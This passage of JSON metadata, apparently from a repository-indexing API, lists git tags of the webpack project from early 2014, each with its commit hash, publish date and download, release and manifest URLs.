l,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5